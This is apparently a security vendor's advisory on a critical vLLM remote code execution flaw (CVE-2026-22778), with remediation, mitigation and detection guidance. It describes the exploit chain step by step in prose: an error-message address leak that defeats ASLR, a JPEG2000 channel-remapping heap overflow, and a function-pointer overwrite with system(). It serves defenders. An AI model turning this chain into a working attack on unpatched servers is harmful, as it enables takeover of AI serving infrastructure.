Introduction

A critical vulnerability (CVE-2026-22778, CVSS 9.8) was disclosed on February 2, 2026, affecting vLLM, a widely-deployed Python library for serving large language models. The flaw allows unauthenticated attackers to achieve remote code execution by sending a specially crafted video URL to the API. No active exploitation has been publicly confirmed yet, but a detailed technical writeup is available. Organizations running vLLM with multimodal video model support should patch to version 0.14.1 immediately.

Quick Overview

AttributeDetails
CVECVE-2026-22778
SeverityCritical (CVSS 9.8)
CWECWE-122 (Heap-based Buffer Overflow), CWE-532 (Information Exposure Through Log Files)
Affected ProductsvLLM
Affected Versions>= 0.8.3, < 0.14.1
Attack VectorNetwork
Authentication RequiredNone
Exploit ComplexityLow
User InteractionNone
Active ExploitationNo confirmed reports
PoC AvailableYes (technical details public)
CISA KEVNo
Fix AvailableYes (version 0.14.1+)

What is vLLM?

vLLM is a high-throughput, memory-efficient inference engine for serving large language models in production environments. It has become a widely-adopted solution for organizations deploying LLMs at scale, offering significant performance improvements over alternatives for concurrent workloads. This is why a vulnerability in vLLM carries substantial risk: compromising a vLLM server can provide attackers access to sensitive model data, user prompts, and potentially the broader infrastructure, as these deployments often run on high-value GPU clusters.

Technical Analysis

This vulnerability is a chained exploit combining two distinct weaknesses that together enable reliable remote code execution.

Stage 1: Information Leak for ASLR Bypass

The first vulnerability exists in how vLLM handles errors from the Python Imaging Library (PIL). When an invalid image is submitted to a multimodal endpoint, PIL raises an exception that includes the memory address of a BytesIO object. In vulnerable versions, vLLM returns this error message directly to the client, exposing a heap address. According to the advisory, this leaked address is approximately 10.33 GB before libc in memory, reducing the effectiveness of Address Space Layout Randomization (ASLR) from approximately 4 billion possible combinations down to around 8 guesses. This transforms what would otherwise be a difficult exploitation scenario into a reliable one.

Stage 2: Heap Overflow in JPEG2000 Decoder

The second vulnerability resides in the JPEG2000 decoder bundled with OpenCV’s FFmpeg dependency. vLLM uses OpenCV to process video content, and when decoding JPEG2000-encoded video frames, the decoder honors a “cdef” (channel definition) box that allows remapping of color channels. An attacker can craft a malicious video where the Y (luma) channel data is directed into the U (chroma) buffer. Since the Y buffer is significantly larger than the U buffer (due to chroma subsampling), this causes a heap overflow. For example, in a 150×64 pixel frame, the Y plane contains 9,600 bytes while the U buffer only holds 2,400 bytes, resulting in a 7,200-byte overflow into adjacent heap memory.

Attack Flow

  1. Attacker sends a request to /v1/chat/completions or /v1/invocations with a video_url parameter pointing to an attacker-controlled server
  2. vLLM fetches and downloads the video content
  3. An initial probe with an invalid image leaks a heap address via the PIL error message
  4. A second request delivers the malicious video containing crafted JPEG2000 frames
  5. OpenCV’s JPEG2000 decoder processes the video, triggering the heap overflow
  6. The overflow overwrites a function pointer (such as AVBuffer’s free pointer) with the address of system()
  7. When the buffer is freed, arbitrary commands execute on the server

Affected Versions

BranchVulnerable VersionsFixed VersionNotes
vLLM>= 0.8.3, < 0.14.10.14.1+Update immediately

Important: Deployments that do not serve video or multimodal models are not affected by this vulnerability. The exploit requires the video processing code path to be reachable.

Threat Status

Exploitation Activity: No confirmed in-the-wild exploitation has been reported as of the disclosure date. However, given the detailed technical writeup available and the critical nature of the vulnerability, exploitation attempts are likely to emerge quickly.

PoC Availability: Technical details sufficient to reproduce the vulnerability have been published in the GitHub Security Advisory. This includes the structure of the malicious cdef box, overflow calculations, and the attack chain methodology.

Attribution: No threat actor attribution has been published.

Why This Matters

This vulnerability is particularly concerning for several reasons.

First, vLLM deployments are high-value targets. Organizations using vLLM are typically running sophisticated AI infrastructure with access to proprietary models, training data, and sensitive user interactions. A compromised vLLM server provides attackers with access to all of this data.

Second, the default configuration amplifies risk. Out-of-the-box vLLM installations do not require authentication, meaning any attacker with network access to the API can attempt exploitation. While API keys can be configured, the vulnerability can be triggered through the invocations route before authentication is validated.

Third, the blast radius extends beyond a single server. vLLM is commonly deployed in clustered environments with GPU resources. Compromising one node can provide a foothold for lateral movement across the broader infrastructure, potentially affecting multiple systems and workloads.

Finally, exploitation is reliable. The information leak component transforms this from a probabilistic attack into a deterministic one, making successful exploitation much more likely once an attacker identifies a vulnerable target.

Remediation

Primary Action

Upgrade vLLM to version 0.14.1 or later immediately. This version includes patches for both the information leak and the underlying heap overflow.

Version-Specific Instructions

Deployment TypeAction
pip installationpip install –upgrade vllm>=0.14.1
DockerUpdate to vllm/vllm-openai:v0.14.1 or later
Source buildsPull latest from main branch and rebuild

Interim Mitigations

If immediate patching is not possible, consider these temporary measures:

  • Disable video model endpoints: If your deployment does not require video processing, disable multimodal video support entirely
  • Restrict network access: Ensure vLLM APIs are not exposed to untrusted networks. Place them behind authentication proxies or VPNs
  • Enable API authentication: Configure API key authentication to add a barrier to exploitation, though note this does not fully mitigate the vulnerability
  • Monitor for suspicious requests: Watch for requests containing external video_url parameters, particularly from untrusted sources

Post-Compromise Considerations

If you suspect a vLLM instance may have been compromised:

  • Isolate the affected system from the network immediately
  • Preserve logs and memory dumps for forensic analysis
  • Review all connected systems for signs of lateral movement
  • Rotate any credentials or API keys that may have been accessible from the compromised host
  • Audit user prompts and model interactions for potential data exfiltration

Detection Guidance

Network-level indicators

  • POST requests to /v1/chat/completions or /v1/invocations containing video_url parameters with external URLs
  • Sequential requests from the same source: first an invalid image probe, then a video request
  • Outbound connections from vLLM servers to unexpected external hosts

Host-level indicators

  • Error logs containing PIL exceptions with memory addresses (pattern: BytesIO object at 0x)
  • Unexpected child processes spawned by the vLLM worker process
  • OpenCV or FFmpeg decoding errors followed by process crashes or unusual behavior

How Can Orca Help?

The Orca Cloud Security Platform helps customers identify cloud assets running affected vLLM versions and understand real exposure context, including internet accessibility, attack path reachability, and asset criticality. By correlating vulnerability data with runtime configuration and infrastructure context, Orca enables teams to prioritize patching and investigation based on true exploitability and blast radius. Orca’s News Item view highlights affected assets directly, helping security teams focus on the most critical systems first.